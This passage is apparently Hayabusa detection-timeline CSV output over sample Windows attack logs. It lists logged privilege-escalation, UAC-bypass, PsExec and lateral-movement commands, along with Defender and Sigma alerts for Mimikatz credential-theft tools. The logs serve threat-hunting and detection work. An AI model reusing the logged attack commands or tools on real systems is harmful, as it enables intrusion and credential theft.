URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: 
C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,../hayabusa-rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx +2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s 
Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx +2020-11-28 05:15:22.956 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-28 05:15:23.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:33.019 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 01:17:34.712 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: 
https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:21.179 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-29 21:31:22.012 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 01:29:22.597 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bsJv4.img?w=100&h=100&m=6&tilesize=medium&x=3175&y=1599&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-30 22:15:33.442 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 8536 | PGUID: 747F3D96-BB00-5FCA-0000-001033CD7600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.470 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:04.545 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-05 07:41:05.471 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49792 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-33FC-5FCB-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_remote_registry_sysmon_1_13_3.evtx +2020-12-10 01:52:34.562 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\psexecprivesc.exe"" C:\Windows\System32\mspaint.exe | Process: C:\Users\Public\psexecprivesc.exe | User: MSEDGEWIN10\user02 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x7485cb | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 
01:52:34.562 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:34.622 +09:00,MSEDGEWIN10,17,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 16344 | PGUID: 747F3D96-00D9-5FD1-0000-001021855301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:41.861 +09:00,MSEDGEWIN10,1,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: System | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.478 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.933 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50335 () | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-76F2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:42.934 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:50336 () | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 876 | PGUID: 
747F3D96-76FB-5FD1-0000-0010E6C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\PSEXESVC | Process: C:\Users\Public\psexecprivesc.exe | PID: 13004 | PGUID: 747F3D96-00D2-5FD1-0000-0010FA4C5301,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:44.864 +09:00,MSEDGEWIN10,18,low,Exec,PsExec Tool Execution,,../hayabusa-rules/sigma/pipe_created/pipe_created_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 01:52:45.141 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mspaint.exe"" 췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍췍 | Process: C:\Windows\System32\mspaint.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\PSEXESVC.exe | LID: 0x3e7 | PID: 7988 | PGUID: 747F3D96-00DD-5FD1-0000-0010F7D25301",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_psexec_dwell.evtx +2020-12-10 07:45:33.090 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.exe | Process: System | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-10 07:45:34.204 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49791 
(MSEDGEWIN10CLON) | Dst: 10.0.2.15:445 (MSEDGEWIN10) | User: | Process: | PID: 4 | PGUID: 747F3D96-CDE2-5FD1-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lateral_movement_startup_3_11.evtx +2020-12-10 20:18:52.190 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49851 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:52.191 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49852 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:135 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\system32\svchost.exe | PID: 896 | PGUID: 747F3D96-7E78-5FD2-0000-0010E1C40000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:52.447 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.17:49853 (MSEDGEWIN10CLON) | Dst: 10.0.2.15:49847 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\svchost.exe | PID: 2784 | PGUID: 747F3D96-FFEE-5FD1-0000-00101DDF0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? 
| LID: 0x3e5 | PID: 5580 | PGUID: 747F3D96-041E-5FD2-0000-001024DF3B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-10 20:18:54.856 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/wmi_remote_registry_sysmon.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.299 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.566 
+09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win64/Mikatz!dha | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimidrv.sys; file:_C:\Users\admmig\Documents\mimilib.dll | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: 
C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D | Severity: High | Type: Tool | User: OFFSEC\admmig | Path: file:_C:\Users\admmig\Documents\mimikatz.exe | Process: C:\Windows\explorer.exe,../hayabusa-rules/hayabusa/default/alerts/WindowsDefender/1116_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx +2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:50007 (MSEDGEWIN10) | Dst: 10.0.2.17:135 (MSEDGEWIN10CLONE) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 6976 | PGUID: 747F3D96-CF4B-5FD8-0000-00101AD58700,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx +2020-12-16 00:00:15.695 
